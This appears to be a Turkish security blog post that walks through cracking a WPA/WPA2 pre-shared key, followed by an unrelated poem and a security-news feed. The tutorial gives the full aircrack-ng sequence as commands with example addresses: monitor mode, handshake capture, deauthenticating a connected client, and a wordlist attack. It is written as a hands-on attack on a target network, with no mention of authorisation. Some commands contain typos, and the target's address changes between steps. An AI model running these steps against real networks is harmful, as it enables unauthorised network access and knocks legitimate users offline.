Kablosuz ağların güvenliği ve kırılması ile ilgili bir önceki yazımızda kablosuz ağ şifreleme algoritması olan WEP güvenliğine ve kırılmasına değinmiştik.Bu eğitim videosunu sitemizden online olarak izleyebildiğiniz gibi http://www.4shared.com/file/96X1unbu/wireless-hacking.html adresinden indirebilirsinizde. Şu ana kadar toplamda 2,530 ~ defa indirilmesi ve bu konuda aldığım mailler konunun hassasiyetini ortaya koyuyor : ))
Konunun devamı niteliğinde olan bu yazıda WPA/WPA2 paylaşımlı anahtarını kullanan networklerin nasıl kırılabileceğini uygulamalı olarak bulabilirsiniz.
Bazı terimler ve değerleri ;
Hedef ağa bağlı istemcinin MAC adresi : 00:1E:4C:43:A6:3E
BSSID (Access Point Cihazının MAC Adresi ) : 00:73:07:38:94:C7
ESSID (Kablosuz ağın ismi) : EVEREST
Access point kanal numarası : 11
Kablosuz ağ arabimi : wlan1
Basit haliyle saldırı adımları ;
- Kablosuz ağ arabirimi access pointin yayın yaptığı kanal için monitor moda alınır
- airodump-ng ile access point’in bulunduğu kanalı dinleyip authentication handshake paketlerini yakalamaya başlanır
- Wireless istemcisine aireplay-ng ile deuthentication paketleri göndererek wireless ağdan düşürülüp, tekrar bağlanması sağlanır
- aircrack-ng yazılımı çalıştırılarak authentication handshake paketlerinden paylaşımlı anahtar elde edilmeye çalışılır.
ADIM 1 : Wireless ağ arabirimini monitor moda almak
airmon-ng start wlan1 11
Adım 2 : airdump-ng ile auth. handshake paketlerinin yakalanması
Çevrede yayın yapan kablosuz ağları tespit etmek için ;
airodump-ng –channel 11 –encyrpt wpa wlan1
11. kanalda wpa şifrelemesi ile yayın yapan EVEREST kablosuz ağını dinlemeye alıyoruz ;
airodump-ng –channel 11 –encyrpt wpa –bssid 00:14:6C:7E:40:80 -w lol wlan1
- –channel parametresi ile kanal (channel) numarası belirtilir
- –encyrpt parametresi ile şifreleme algoritması (wpa) belirtilir
- –bssid hedef Access Point’in mac adresi
- -w ile yakalanan paketlerin yazılacağı dosya ismi
Adım 3 : aireplay-ng ile wireless istemcisini kimlikdoğrulamaya zorlamak
Bu işlem opsiyoneldir, isterseniz bir istemcinin kablosuz ağa dahil olup handshake paketlerini yakalamayı bekleyebilirsiniz veya deauth. paketleri gönderip kablosuz ağa bağlı istemciniyi düşürüp tekrar bağlanmasını sağlayabilirsiniz böylelikle zaman kaybetmeden istiyacımız olan handshake paketini yakalamış oluruz. Detaylar burada = http://www.aircrack-ng.org/doku.php?id=deauthentication
aireplay-ng -0 5 -a 00:73:07:38:94:C7 -c 00:1E4C:43:A6:3E wlan1
- -0 deauthentication paketi hazırlar
- 5 toplam paket sayısı
- -a Access point’in mac adresi
- -c İstemcinin mac adresi
- wlan1 kullanılacak ağ arabirimi
Bu adımı gerçekleştirdikden hemen sonra, deauth. saldırısı başarılımı ve handshake yakalamışmıyız bakmak için airodump-ng ekranına geçiş yapabiliriz
Deuthentication ve Authentication paketlerinin detaylarını merak ediyorsanız, bu işlem sırasında wireshark ile paket analizi yapabilirsiniz.
Adım 4: airecrack-ng ile paylaşımlı anahtarın kırılması
Yakaladığımız paketlerden paylaşımlı anahtarı kırmak için geniş bir parola veritabanımız/sözlüğümüz olmalı. Eğer hedef sistemin parolası bizim sözlüğümüzde yoksa parolayı elde etmek bir ömür sürebilir.Bu için bakınız. “parola kırma teknikleri”
airecrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -c lol-o1.cap
- -w wordlist/sözlük/parola veritabanının yolunu belirtir
- -c .cap dosyasının yolunu belirtir
Mutlu son : ))
Haftanın Klibi
KAHRAMANLIK
Kahramanlık ne yalnız bir yükseliş demektir,
Ne de yıldızlar gibi parlayıp sönmektir.
Ölmezliği düşünmek boşuna bir emektir;
Kahramanlık; saldırıp bir daha dönmemektir.
Sızlasa da gönüller düşenlerin yasından
Koşar adım gitmeli onların arkasından.
Kahramanlık; içerek acı ölüm tasından
İleriye atılmak ve sonra dönmemektir.
Yırtıcılar az yaşar... Uzun sürmez doğanlık...
Her ışığın ardında gizlidir bir karanlık.
Adsız sansız olsa da, en büyük kahramanlık;
Göz kırpmadan saldırıp bir daha dönmemektir.
Kahramanlık ne yalnız bir yükseliş demektir,
Ne de yıldızlar gibi parlayıp sönmektir.
Bunun için ölüme bir atılış gerekir.
Atıldıktan sonra bir daha dönmemektir...
Hüseyin Nihal Atsiz
Kategoriler
Hacks – Threatpost | The first stop for security news
- Researcher: Not Hard for a Hacker to Capsize a Ship at Sea 20 Şubat 2019Maritime transport still contributes in an important way to the world’s economy, with on-time shipments influencing everything from commodities availability and spot pricing to the stability of small countries. Unfortunately, capsizing a ship with a cyberattack is a relatively low-skill enterprise, according to an analysis from Pen Test Partners. With so many previously outlined ways […]
- Separ Malware Plucks Hundreds of Companies’ Credentials in Ongoing Phish 20 Şubat 2019An ongoing phishing campaign is targeting hundreds of businesses to steal their email and browser credentials using a simply - but effective - malware.
- Microsoft: Russia’s Fancy Bear Working to Influence EU Elections 20 Şubat 2019As hundreds of millions of Europeans prepare to go to the polls in May, Fancy Bear ramps up cyber-espionage and disinformation efforts.
- ThreatList: APT Adversaries Up the Ante on Speed, Target Telecom 19 Şubat 2019Russia-linked actors need just 18 minutes to go from compromise to lateral movement.
- New GandCrab Decryptor Unlocks Files of Updated Ransomware 19 Şubat 2019This is the third update to the prolific GandCrab malware within the past year.
- ATM Jackpotting Malware Hones Its Heist Tools 19 Şubat 2019The WinPot malware takes its cues from slot machines.
Leave a reply